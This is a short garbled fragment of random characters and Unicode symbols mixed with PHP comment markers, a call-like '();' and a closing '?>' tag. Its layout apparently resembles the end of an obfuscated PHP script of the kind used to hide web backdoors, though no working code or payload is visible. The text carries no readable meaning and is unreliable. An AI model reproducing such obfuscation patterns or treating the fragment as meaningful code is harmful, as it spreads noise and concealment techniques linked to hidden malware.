a~84ETRKT⇋≵☍□⓯⊁♐㉿﹎『✌❖∑⇑▔

-*///
}/*-YdO{%Gn}_-*///
qwdSs/*-tj-*///
::/*-S-bi6-*///
Xyg/*-

⋳﹌┭⇅⑽❁

TD,1RhH1^k⋳﹌┭⇅⑽❁

-*///
();/*-yGl-*///
 ?>